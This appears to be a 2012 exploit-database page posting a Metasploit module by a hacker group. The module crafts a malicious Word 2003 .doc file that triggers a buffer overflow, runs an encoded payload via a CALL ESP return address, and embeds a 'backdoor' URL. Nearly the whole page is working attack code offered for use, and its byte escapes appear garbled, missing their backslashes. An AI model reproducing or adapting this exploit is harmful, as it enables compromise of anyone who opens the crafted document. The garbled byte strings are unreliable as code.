Home / exploitsPDF  

Microsoft Office 2003 .doc Buffer Overflow

Posted on 26 January 2012

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /'  __ /'__` / \__ /'__` 0
0 /\_,  ___ /\_/\_   ___  ,_/ /  _ ___ 1
1 /_/  /' _ ` / /_/_\_<_ /'___  /    /`'__ 0
0   / /    /   / \__/  \_  \_   / 1
1  \_ \_ \_\_   \____/ \____\ \__\ \____/ \_ 0
0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1
1  \____/ >> Exploit database separated by exploit 0
0 /___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm KedAns-Dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

###
# Title : Microsoft Office 2003 (.doc) Command Exec and local BOF (msf)
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.com
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com
# Facebook : http://facebook.com/KedAns
# platform : windows ( local BOF via MSF)
# Type : local exploit / Buffer Overflow / Metasploit
###

##
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h |
# | KinG Of PiraTeS * The g0bl!n * soucha * dr.R!dE .. |
# | ------------------------------------------------- < |
###

##
# $Id: ms09_067_word_exec.rb | 01:59 25/01/2012| KedAns-Dz $
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = GoodRanking

 include Msf::Exploit::FILEFORMAT

 def initialize(info = {})
 super(update_info(info,
 'Name' => 'Microsoft Office 2003 (.doc) Command Exec and local BOF',
 'Description' => %q{
 This module exploits a buffer overflow in Microsoft Office 2003
 and Command Exec With .doc file .
 },
 'License' => MSF_LICENSE,
 'Author' =>
 [
 'b33f',
 'g11tch',
 'KedAns-Dz <ked-h[at]hotmail.com>' # MSF module
 ],
 'Version' => '1.0',
 'References' =>
 [
 [ 'URL', 'http://exploit-db/exploits/18334' ],
 ],
 'DefaultOptions' =>
 {
 'EXITFUNC' => 'process',
 },
 'Payload' =>
 {
 'Space' => 1024,
 'BadChars' => "'",
 'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
 'EncoderOptions' =>
 {
 'BufferRegister' => 'ESI',
 }
 },
 'Platform' => 'win',
 'Targets' =>
 [
 [ 'Microsoft Office 2003 - MSWord (.doc Heap Spray)', { 'Ret' => '' } ],
 ],
 'DisclosureDate' => 'JAN 08 2012',
 'DefaultTarget' => 0))

 register_options(
 [
 OptString.new('FILENAME', [ true, 'The file name.', 'msf.doc']),
 OptString.new('URLBD', [ true, 'URL From the Backdoor.', 'http://']),
 ], self.class)
 end

 def exploit
 # Encode the url.
 url = Rex::Text.to_unescape(datastore['URLBD'])

 # Header File
 file =
 "x7bx5cx72x74x23x23x7bx5cx73x68x70x7bx5cx73x70"+
 "x7dx7dx7bx5cx73x68x70x7bx5cx73x70x7dx7dx7bx5cx73"+
 "x68x70x7bx5cx73x70x7dx7dx7bx5cx73x68x70x7bx5cx2a"+
 "x5cx73x68x70x69x6ex73x74x5cx73x68x70x66x68x64x72"+
 "x30x5cx73x68x70x62x78x63x6fx6cx75x6dx6ex5cx73x68"+
 "x70x62x79x70x61x72x61x5cx73x68x20x70x77x72x32x7d"+
 "x7bx5cx73x70x7bx5cx73x6ex20x7bx7dx7bx7dx7bx5cx73"+
 "x6ex7dx7bx5cx73x6ex7dx7bx5cx2ax5cx2ax7dx70x46x72"+
 "x61x67x6dx65x6ex74x73x7dx7bx5cx2ax5cx2ax5cx2ax5c"+
 "x7bx5cx73x76x7bx5cx2ax5cx2ax5cx2ax5cx2ax5cx2ax5c"+
 "x2ax5cx2ax5cx2ax5cx2ax5cx2ax5cx2ax5cx2ax5cx2ax52"+
 "x2ax5cx2ax5cx2ax5cx2ax5cx2ax5cx2ax5cx2ax5cx2ax5c"+
 "x2ax5cx2ax5cx2ax5cx2ax5cx2ax7dx39x3bx32x3bx66x66"+
 "x66x66x66x66x66x66x66x66"
 # Buffer Overflow
 buf = "x23" * 501
 buf << "x30x35"
 buf << "x30" * 40
 buf << "x36x36x34x33x33x32x33x30" # CALL ESP - WINWORD.exe
 buf << "x30x30x30x30x38x30x37x63" * 2
 buf << rand_text_alpha(42)
 buf << "x39x30" * 18
 buf << payload.encoded

 # Create the doc
 doc = file
 doc << buf
 doc << url
 doc << "x00"
 doc << "{}}}}}}"
 doc << "x0dx0a"
 doc << "}"

 print_status("Creating '#{datastore['FILENAME']}' file...")

 file_create(doc)
 end

end

#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=====================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > || Rizky Ariestiyansyah * Islam Caddy
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * Kalashinkov3 * SeeMe * ZoRLu * anT!-Tr0J4n
# Anjel Injection (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * Sec4ever
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X
# Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * KinG Of PiraTeS * www.packetstormsecurity.org * TreX
# www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs ..
#=================================================================================================

 

TOP

Malware :

Exploits :